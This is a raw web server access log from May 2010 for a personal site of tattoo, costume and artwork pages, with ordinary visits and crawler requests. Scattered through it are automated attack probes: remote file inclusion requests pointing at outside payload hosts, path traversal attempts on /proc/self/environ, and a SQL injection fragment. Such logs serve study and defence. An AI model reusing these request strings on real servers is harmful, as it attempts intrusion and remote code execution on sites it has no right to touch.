71.239.236.212 - - [04/May/2010:15:49:41 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:49:41 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
124.49.100.254 - - [04/May/2010:15:49:49 -0500] "GET /logs/access_log.1262822400//?p=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
124.49.100.254 - - [04/May/2010:15:49:49 -0500] "GET /logs//?p=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 4246 "-""Mozilla/5.0"
124.49.100.254 - - [04/May/2010:15:49:50 -0500] "GET //?p=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
124.49.100.254 - - [04/May/2010:15:49:50 -0500] "GET /logs/access_log.1264032000//?p=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
71.239.236.212 - - [04/May/2010:15:50:24 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:50:24 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:50:24 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:50:24 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:50:24 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:50:24 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:50:24 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:50:24 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:50:24 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:50:24 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:50:24 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:51:09 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:51:09 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:51:09 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:51:09 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
216.129.119.13 - - [04/May/2010:15:51:51 -0500] "GET /logs/access_log.1215561600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.195.240 - - [04/May/2010:15:55:23 -0500] "GET /logs/access_log.1169337600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [04/May/2010:15:56:20 -0500] "GET /artwork/tombio.htm HTTP/1.1" 404 302 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.129.119.11 - - [04/May/2010:15:58:16 -0500] "GET /logs/access_log.1242691200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
69.170.138.158 - - [04/May/2010:16:00:11 -0500] "GET //poll/poll_ssi.php?include_path=http://christenplein.com/id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
69.170.138.158 - - [04/May/2010:16:00:11 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://christenplein.com/id1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
69.170.138.158 - - [04/May/2010:16:00:11 -0500] "GET /logs/access_log.1268956800%20%20//poll/poll_ssi.php?include_path=http://christenplein.com/id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
121.190.102.21 - - [04/May/2010:16:02:13 -0500] "GET //poll/poll_ssi.php?include_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
121.190.102.21 - - [04/May/2010:16:02:13 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
121.190.102.21 - - [04/May/2010:16:02:13 -0500] "GET /logs/access_log.1268956800%20%20//poll/poll_ssi.php?include_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
69.170.138.158 - - [04/May/2010:16:03:40 -0500] "GET /logs/access_log.1237852800%20%20//poll/poll_ssi.php?include_path=http://christenplein.com/id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
91.191.173.120 - - [04/May/2010:16:03:58 -0500] "GET /logs//components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 338 "-""libwww-perl/5.805"
91.191.173.120 - - [04/May/2010:16:03:59 -0500] "GET //components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 333 "-""libwww-perl/5.805"
67.218.116.163 - - [04/May/2010:16:04:06 -0500] "GET /logs/access_log.1232409600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.13.132 - - [04/May/2010:16:04:23 -0500] "GET /logs/access_log.1215216000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.190.102.21 - - [04/May/2010:16:04:28 -0500] "GET /logs/access_log.1237852800%20%20//poll/poll_ssi.php?include_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
65.55.37.202 - - [04/May/2010:16:06:01 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.37.202 - - [04/May/2010:16:06:51 -0500] "GET /logs/access_log.1195257600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.191.173.120 - - [04/May/2010:16:09:44 -0500] "GET //components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 333 "-""libwww-perl/5.805"
87.250.255.243 - - [04/May/2010:16:09:48 -0500] "GET /logs/access_log.1271289600 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
69.170.138.158 - - [04/May/2010:16:10:26 -0500] "GET /logs/access_log.1268956800//poll/poll_ssi.php?include_path=http://christenplein.com/id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.190.102.21 - - [04/May/2010:16:10:33 -0500] "GET /logs/access_log.1268956800//poll/poll_ssi.php?include_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.190.102.21 - - [04/May/2010:16:10:33 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
121.190.102.21 - - [04/May/2010:16:10:33 -0500] "GET //poll/poll_ssi.php?include_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
121.190.102.21 - - [04/May/2010:16:12:15 -0500] "GET /logs/access_log.1268956800%20%20//poll/poll_ssi.php?include_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
121.190.102.21 - - [04/May/2010:16:14:55 -0500] "GET /logs/access_log.1237852800%20%20//poll/poll_ssi.php?include_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
213.189.224.16 - - [04/May/2010:16:19:58 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://gonapus.net/chat2/2?? HTTP/1.1" 404 313 "-""Mozilla/4.61 (Macintosh; I; PPC)"
213.189.224.16 - - [04/May/2010:16:19:58 -0500] "GET //include/bbs.lib.inc.php?site_path=http://gonapus.net/chat2/2?? HTTP/1.1" 404 308 "-""Mozilla/4.61 (Macintosh; I; PPC)"
81.234.149.2 - - [04/May/2010:16:20:50 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
81.234.149.2 - - [04/May/2010:16:20:50 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
87.250.255.243 - - [04/May/2010:16:20:52 -0500] "GET /logs/access_log.1272240000 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
81.234.149.2 - - [04/May/2010:16:20:52 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
81.234.149.2 - - [04/May/2010:16:20:55 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
205.188.116.144 - - [04/May/2010:16:24:51 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume_design""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
83.237.227.75 - - [04/May/2010:16:25:14 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
205.188.116.70 - - [04/May/2010:16:28:30 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
205.188.116.73 - - [04/May/2010:16:28:31 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
205.188.116.132 - - [04/May/2010:16:28:31 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
205.188.117.5 - - [04/May/2010:16:28:31 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
67.195.112.180 - - [04/May/2010:16:30:03 -0500] "GET /logs/access_log.1164585600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
205.188.116.71 - - [04/May/2010:16:31:08 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
87.250.255.243 - - [04/May/2010:16:33:12 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
66.249.71.176 - - [04/May/2010:16:36:03 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.129.119.41 - - [04/May/2010:16:37:24 -0500] "GET /logs/access_log.1266278400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
80.71.1.68 - - [04/May/2010:16:38:25 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 200 4248 "-""libwww-perl/5.805"
80.71.1.68 - - [04/May/2010:16:38:27 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 200 1005 "-""libwww-perl/5.805"
91.191.173.120 - - [04/May/2010:16:39:27 -0500] "GET /index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.13.136 - - [04/May/2010:16:44:54 -0500] "GET /logs/access_log.1160870400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [04/May/2010:16:45:25 -0500] "GET /artwork/dioramas.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
205.188.117.18 - - [04/May/2010:16:45:36 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
205.188.117.5 - - [04/May/2010:16:45:37 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
205.188.116.145 - - [04/May/2010:16:45:38 -0500] "GET /costume/001_JPG%20copy.jpg HTTP/1.1" 200 46065 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
205.188.116.195 - - [04/May/2010:16:45:38 -0500] "GET /costume/002_JPG%20copy.jpg HTTP/1.1" 200 44353 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
205.188.116.196 - - [04/May/2010:16:45:39 -0500] "GET /costume/003_JPG%20copy.jpg HTTP/1.1" 200 50590 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
205.188.116.197 - - [04/May/2010:16:45:39 -0500] "GET /costume/004_JPG%20copy.jpg HTTP/1.1" 200 44129 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
205.188.116.198 - - [04/May/2010:16:45:40 -0500] "GET /costume/005_JPG%20copy.jpg HTTP/1.1" 200 44973 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
205.188.116.199 - - [04/May/2010:16:45:40 -0500] "GET /costume/006_JPG%20copy.jpg HTTP/1.1" 200 49320 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
205.188.116.200 - - [04/May/2010:16:45:41 -0500] "GET /costume/007_JPG%20copy.jpg HTTP/1.1" 200 43100 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
66.249.71.176 - - [04/May/2010:16:46:32 -0500] "GET /logs/ HTTP/1.1" 200 4241 "-""DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
207.46.13.93 - - [04/May/2010:16:47:53 -0500] "GET /logs/access_log.1188432000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
92.240.42.10 - - [04/May/2010:16:49:12 -0500] "GET /logs//write_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""libwww-perl/5.805"
92.240.42.10 - - [04/May/2010:16:49:12 -0500] "GET //write_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.805"
80.71.1.68 - - [04/May/2010:16:49:24 -0500] "GET /logs/access_log.1272067200//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 373 "-""libwww-perl/5.805"
80.71.1.68 - - [04/May/2010:16:49:24 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
80.71.1.68 - - [04/May/2010:16:49:25 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
207.46.13.46 - - [04/May/2010:16:49:53 -0500] "GET /logs/access_log.1245196800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.221.208.180 - - [04/May/2010:16:51:30 -0500] "GET /logs/access_log.1265068800+and+0=1+union+select+ HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
213.189.224.16 - - [04/May/2010:16:53:42 -0500] "GET //include/bbs.lib.inc.php?site_path=http://gonapus.net/chat2/2?? HTTP/1.1" 404 308 "-""Mozilla/4.61 (Macintosh; I; PPC)"
213.189.224.16 - - [04/May/2010:16:53:42 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://gonapus.net/chat2/2?? HTTP/1.1" 404 313 "-""Mozilla/4.61 (Macintosh; I; PPC)"
87.250.255.243 - - [04/May/2010:16:57:39 -0500] "GET /artwork/toys.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
124.49.100.254 - - [04/May/2010:16:59:41 -0500] "GET /logs//main.php?a=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
124.49.100.254 - - [04/May/2010:16:59:41 -0500] "GET /logs/access_log.1264032000//main.php?a=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
124.49.100.254 - - [04/May/2010:16:59:41 -0500] "GET /logs/access_log.1262822400//main.php?a=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
124.49.100.254 - - [04/May/2010:16:59:41 -0500] "GET //main.php?a=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
91.191.173.120 - - [04/May/2010:17:03:19 -0500] "GET /logs/access_log.1212451200/index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
91.191.173.120 - - [04/May/2010:17:03:20 -0500] "GET /index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
91.191.173.120 - - [04/May/2010:17:03:21 -0500] "GET /logs/index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.195.112.180 - - [04/May/2010:17:05:11 -0500] "GET /logs/access_log.1170892800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
124.49.100.254 - - [04/May/2010:17:08:29 -0500] "GET /logs//main.php?a=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
124.49.100.254 - - [04/May/2010:17:08:29 -0500] "GET //main.php?a=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
124.49.100.254 - - [04/May/2010:17:08:29 -0500] "GET /logs/access_log.1264032000//main.php?a=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
124.49.100.254 - - [04/May/2010:17:08:29 -0500] "GET /logs/access_log.1262822400//main.php?a=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
87.250.255.243 - - [04/May/2010:17:11:05 -0500] "GET /artwork/hospitals.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
72.30.142.216 - - [04/May/2010:17:13:08 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [04/May/2010:17:13:09 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.204.185 - - [04/May/2010:17:13:54 -0500] "GET /logs/access_log.1225843200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.185 - - [04/May/2010:17:13:54 -0500] "GET /logs/access_log.1192665600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.46.190.110 - - [04/May/2010:17:14:19 -0500] "GET //atom.php5?page=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.46.190.110 - - [04/May/2010:17:14:19 -0500] "GET /logs//atom.php5?page=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.46.190.110 - - [04/May/2010:17:14:19 -0500] "GET /logs/access_log.1263600000//atom.php5?page=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.46.190.110 - - [04/May/2010:17:14:26 -0500] "GET /logs/access_log.1266537600//atom.php5?page=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
